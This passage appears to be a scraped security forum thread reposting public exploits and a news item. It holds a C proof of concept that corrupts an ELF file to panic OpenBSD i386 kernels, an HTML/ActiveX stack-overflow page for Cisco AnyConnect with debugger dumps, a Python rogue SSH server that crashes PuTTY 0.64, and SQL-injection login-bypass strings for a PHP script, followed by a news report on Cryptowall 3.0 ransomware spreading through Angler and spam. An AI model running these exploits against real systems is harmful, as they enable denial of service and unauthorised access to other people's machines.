  19. Impact A non-privileged use could cause a local Denial-of-Service (DoS) condition by triggering a kernel panic through a malformed ELF executable. The kernel panic is reached at the UVM (virtual memory) subsystem. There are different if-else validations inside uvm_map(),and uvm_map_vmspace_update() is called in the last else block as follows: sys/uvm/uvm_map.c: if (flags & UVM_FLAG_FIXED) { ... } else if (*addr != 0 && (*addr & PAGE_MASK) == 0 && (map->flags & VM_MAP_ISVMSPACE) == VM_MAP_ISVMSPACE && (align == 0 || (*addr & (align - 1)) == 0) && uvm_map_isavail(map, NULL, &first, &last, *addr, sz)) { /* * Address used as hint. * * Note: we enforce the alignment restriction, * but ignore pmap_prefer. */ } else if ((maxprot & VM_PROT_EXECUTE) != 0 && ... } else { /* * Update freelists from vmspace. */ if (map->flags & VM_MAP_ISVMSPACE) uvm_map_vmspace_update(map, &dead, flags); Exploit /* * tenochtitlan.c * * OpenBSD <= 5.7 Local Kernel Panic * by d4t (@brunolcr) * * This PoC works only for i386. * * */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/param.h> #include <sys/types.h> #ifndef __OpenBSD__ #error "Not an OpenBSD system !!!1111"; #else #include <sys/exec_elf.h> #endif #ifndef __i386__ #error "Not an i386 system !!!1111"; #endif // In Aztec mythology, Huitzilopochtli, was a god of war, a sun god, // the patron of the city of Tenochtitlan, the Capital of the Aztec Empire. const char pyramid[] = " _____\n" " _|[]_|_\n" " _/_/=|_\\_\\_\n" " _/_ /==| _\\ _\\_\n" " _/__ /===|_ _\\ __\\_\n" " _/_ _ /====| ___\\ __\\_\n" " _/ __ _/=====|_ ___\\ ___ \\_\n" " _/ ___ _/======| ____ \\_ __ \\_\n"; struct { unsigned int idx; Elf32_Word p_align; } targets[] = { { 6, 0xb16b00b5 }, // ( * )( * ) { 6, 0xdeadface }, { 4, 0x00001001 }, { 0, 0x00000004 } }; int main(int argc, char **argv) { Elf32_Ehdr *hdr; Elf32_Phdr *pht; // Program Header Table struct stat statinfo; char *elfptr; int fd, r; if(argc < 2){ fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]); exit(-1); } if((fd = open(argv[1], O_RDWR)) == -1){ perror("open"); exit(-1); } if(fstat(fd, &statinfo) == -1){ perror("stat"); close(fd); exit(-1); } if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){ perror("mmap"); close(fd); exit(-1); } hdr = (Elf32_Ehdr *) (elfptr); pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff); printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff); printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum); srand(time(NULL)); r = rand(); if(r % 3 == 0){ #ifdef OpenBSD5_5 pht[targets[0].idx].p_align = targets[0].p_align; printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align); #else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align pht[targets[1].idx].p_align = targets[1].p_align; printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align); #endif } else if(r % 3 == 1){ pht[targets[2].idx].p_align = targets[2].p_align; printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align); } else { int p; for(p = 0; p < hdr->e_phnum; p++, pht++) if(pht->p_type == PT_LOAD){ pht->p_align = targets[3].p_align; printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align); } } // Synchronize the ELF in memory and the file system if(msync(elfptr, 0, MS_ASYNC) == -1){ perror("msync"); close(fd); exit(-1); } if(munmap(elfptr, statinfo.st_size) == -1){ perror("munmap"); close(fd); exit(-1); } close(fd); printf("%s", pyramid); sleep(1); system(argv[1]); // Should never reach this point, however sometimes the OS didn't crash with // system() until the 2nd execution. Same behavior with execl and execv too. printf("... try to execute %s manually.\n", argv[1]); return -1; } Source
  20. ?<!-- Cisco AnyConnect Secure Mobility Client Remote Command Execution Vendor: Cisco Systems, Inc. Product web page: http://www.cisco.com Affected version: 2.x 3.0 3.0.0A90 3.1.0472 3.1.05187 3.1.06073 3.1.06078 3.1.06079 3.1.07021 3.1.08009 4.0.00013 4.0.00048 4.0.00051 4.0.02052 4.0.00057 4.0.00061 4.1.00028 Fixed in: 3.1.09005 4.0.04006 4.1.02004 4.1.02011 Summary: Cisco AnyConnect Secure Mobility Solution empowers your employees to work from anywhere, on corporate laptops as well as personal mobile devices, regardless of physical location. It provides the security necessary to help keep your organization’s data safe and protected. Desc: The AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code. ========================================================================== (f48.10cc): Unknown exception - code 000006ba (first chance) (f48.10cc): C++ EH exception - code e06d7363 (first chance) (f48.10cc): C++ EH exception - code e06d7363 (first chance) (f48.10cc): Stack overflow - code c00000fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll - eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 vpnapi!ConnectIfcData::setConfigCookie+0x9195: 748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 0:000> g (f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!) eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 vpnapi!ConnectIfcData::setConfigCookie+0x9195: 748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 0:000> d edi 088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0:000> d edx 088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. <12308000 B ---- >512150-512154 B First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll - eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 RPCRT4!UuidCreate+0x835: 75440fc4 56 push esi 0:000> g (1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!) eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 RPCRT4!UuidCreate+0x835: 75440fc4 56 push esi 0:000> d eax 004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client 004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn 004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\C 004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp 004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call 004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg 004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne 004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent... 0:000> d 004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA 004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0:000> d esp+1500 00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t.... 00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA ========================================================================== Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [25.03.2015] Vulnerability discovered. [28.03.2015] Vendor contacted. [29.03.2015] Vendor responds asking more details. [13.04.2015] Sent details to the vendor. [15.04.2015] Asked vendor for status update. [15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact. [22.04.2015] Asked vendor for status update. [28.04.2015] No reply from the vendor. [04.05.2015] Asked vendor for status update. [05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation. [12.05.2015] Asked vendor for confirmation. [13.05.2015] Vendor resolved the issue, not sure for the release date. [14.05.2015] Asked vendor for approximate scheduled release date. [15.05.2015] Vendor informs that the defect is public (CSCuu18805). [19.05.2015] Asked vendor for release information. [19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2. [11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue. [13.06.2015] Public security advisory released. Advisory ID: ZSL-2015-5246 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php[/url] Vendor: [url]https://tools.cisco.com/bugsearch/bug/CSCuu18805[/url] 25.03.2015 --> <!DOCTYPE html> <html> <head> <title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title> </head> <body> <button onclick="O_o()">Launch</button> <object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object> <script language="JavaScript"> function O_o() { //targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll" //prototype = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )" //memberName = "ConnectVpn" //progid = "VpnApiLib.VpnApi" var netv = Array(255712).join("ZS"); var push = //~~~~~~~~~~~~~~~~~~~~~~~~// /*(()()())*/ "ZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZ"+ "SZSZ" +"SZSZSZ"+ "SZSZSZ"+ "SZSZ" +"SZSZSZ"+ "SZSZS"+ "ZSZS" +"ZSZSZ"+ "SZSZS"+ "ZSZS" +"ZSZSZ"+ "SZSZS"+"ZSZSZ"+"SZSZS"+ "SZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZ" +"SZSZSZSZSZSZ"+ "SZSZ"+ "SZSZSZS" +"ZSZSZSZSZSZSZS"+ "ZSZS"+ "ZSZSZSZ" +"SZSZSZSZSZSZSZ"+ "SZSZ"+ "SZSZSZSZ"+ "SZSZSZSZSZSZSZSZS"+ "ZSZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+ "SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "S"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "S"; var godeep = netv.concat(push); cisco.ConnectVpn godeep } </script> </body> </html> Source
  21. ''' # Exploit title: putty v0.64 denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe # Version: 0.64 # Author: 3unnym00n # Details: # -------- # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh root@ ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-paramiko_1.16.0\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg) [ur=https://www.exploit-db.com/exploits/37291/]Source
  22. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | | Date: 06.13.2015 | | Exploit Daddy: Walid Naceri | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Kali Linux, Mac, Windows | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | Website exploiter: WwW.security-Dz.Com | | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | | Sorry: Sorry pancaker, you missed that one | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez admin/login.php ### <? $usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing? $pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer? if($usr && $pwd){ $login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';"); $row = mysql_num_rows($login); ----Bla Bla Bla-------- ### manual ### Go to the login admin panel Exploit 1: USER: ADMIN' OR ''=' PASS: ADMIN' OR ''=' Exploit 2: USER: ADMIN' OR 1=1# PASS: Anything Bro ### How to fix, learn bro some php again ### $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr']))); $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd']))); Source
  23. Since the Angler Exploit Kit began in late May spreading Cryptowall 3.0 ransomware, traffic containing the malware has continued to grow, putting more potential victims in harm’s way. Today, the SANS Internet Storm Center reported that Cryptowall 3.0 infections are emanating from not only the prolific exploit kit, but also from malicious spam campaigns. The two means of infections share some common characteristics, lending credence to the theory that the same group may be behind both. Version 3.0 is the latest iteration of Cryptowall, which is also known as Crowti. Like other ransomware families, Cryptowall 3.0 encrypts files stored on a compromised computer and demands a ransom, usually $500 payable in Bitcoin, in exchange for the encryption key. The malware uses numerous channels to communicate and send stolen traffic to its keepers, including I2P and Tor anonymity networks. Researchers at Cisco in February said that Cryptowall 3.0 abandoned using a dropper for propagation, opting instead to use exploit kits. As of this morning, SANS incident handler and Rackspace security researcher Brad Duncan said that the latest run of Angler Exploit Kit traffic showed that the attackers had added a different Bitcoin address than the one used previously. “At this point, I’m not 100 percent certain it’s the same actor behind all this Cryptowall 3.0 we’ve been seeing lately,” Duncan wrote on the SANS ISC website. “However, my gut feeling tells me this activity is all related to the same actor or group. The timing is too much of a coincidence.” Duncan told Threatpost that a check on blockchain.info for activity on the two Bitcoin addresses shows some transactions, indicating some victims are paying the ransom. “We’re seeing a lot more samples of CryptoWall 3.0 in the spam/EK traffic now than before, so maybe the increased exposure might help infect more computers,” Duncan said, adding that he had no data on whether any of the victims who did pay the ransom were receiving encryption keys and are able to salvage their data. Duncan said this latest spike began May 25 from both the malicious spam and Angler angles; both campaigns were still active as of early this morning. The spam campaign uses Yahoo email addresses to send Cryptowall 3.0 via attachments. The attachments are called my_resume.zip and contain an HTML file called my_resume.svg. Duncan said the attackers have begun appending numbers to the file names, such as resume4210.html or resume9647.html. “Opening the attachment and extracting the malicious file gives you an HTML document. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan wrote. “The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server.” Cryptowall is hosted on a number of different docs.google.com URLs, he said, a list of which is posted on the SANS website. The Bitcoin address used for payment in the spam campaign is 16REtGSobiQZoprFnXZBR2mSWvRyUSJ3ag, the same address found in other spam samples. Infections coming from Angler began May 26, and were the first Cryptowall 3.0 infections seen from Angler. The Bitcoin address used in Angler infections is 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB, SANS said. Duncan reports that a second Bitcoin address, 12LE1yNak3ZuNTLa95KYR2CQSKb6rZnELb, was used as of today. “There are any number of reasons to use more than one Bitcoin address. It could be a back-up, in case law enforcement is closing in on the other one. It could be a way to track different infections, geographically,” Duncan said. “I’m not sure on this one. It’s just my gut feeling, which could be wrong.” Duncan said that a new slate of WordPress sites were redirecting to Angler in this campaign, based on web injects observed. “The significance is that there are plenty of vulnerable websites running outdated or unpatched versions of WordPress,” Duncan said. “The actors behind this (and other) campaigns will have a continuous supply of websites that can be compromised and used for these efforts.” Source
  24. Nu sunt @io.kent Cum poti spune asta fara sa fie adevarat?
  • Create New...